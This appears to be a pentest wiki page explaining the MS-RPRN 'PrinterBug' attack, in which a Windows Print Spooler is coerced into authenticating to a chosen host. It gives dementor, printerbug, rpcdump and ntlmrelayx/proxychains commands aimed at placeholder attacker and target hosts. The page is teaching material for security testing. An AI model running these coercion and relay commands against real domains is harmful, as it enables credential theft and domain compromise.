MS-RPRN abuse (PrinterBug)

Theory

Microsoft’s Print Spooler is a service handling the print jobs and other various tasks related to printing. An attacker controlling a domain user/computer can, with a specific RPC call, trigger the spooler service of a target running it and make it authenticate to a target of the attacker's choosing. This flaw is a "won't fix" and enabled by default on all Windows environments (more info on the finding).
The "specific call" mentioned above is the RpcRemoteFindFirstPrinterChangeNotificationEx notification method, which is part of the MS-RPRN protocol. MS-RPRN is Microsoft’s Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server.
The attacker needs a foothold on the domain (i.e. compromised account) for this attack to work since the coercion is operated through an RPC call in the SMB \pipe\spoolss named pipe through the IPC$ share.

Practice

Remotely checking if the spooler is available can be done with SpoolerScanner (Powershell) or with rpcdump (Python).
The spooler service can be triggered with printerbug (Python), dementor (Python), the adapted original .NET code (here).
dementor
printerbug
rpcdump
SpoolerScanner
ntlmrelayx
Trigger the spooler service
1
dementor.py -d $DOMAIN -u $DOMAIN_USER -p $PASSWORD $ATTACKER_IP $TARGET
Copied!
Trigger the spooler service
1
printerbug.py 'DOMAIN'/'USER':'PASSWORD'@'TARGET' 'ATTACKER HOST'
Copied!
Check if the spooler service is available
1
rpcdump.py $TARGET | grep -A 6 "spoolsv"
Copied!
Check if the spooler service is available
1
Copied!
In the situation where the tester doesn't have any credentials, it is still possible to relay an authentication and trigger the spooler service of a target via a SOCKS proxy.
1
ntlmrelayx.py -t smb://$TARGET -socks
2
proxychains dementor.py -d $DOMAIN -u $DOMAIN_USER $ATTACKER_IP $TARGET
Copied!
Nota bene: the coerced NTLM authentication will be made through SMB. This is important because it restricts the possibilites of NTLM relay. For instance, an "unsigning cross-protocols relay attack" from SMBv2 to LDAP will only be possible if the target is vulnerable to CVE-2019-1040 or CVE-2019-1166.

Resources

Not A Security Boundary: Breaking Forest Trusts - harmj0y
harmj0y
Last modified 2mo ago
Copy link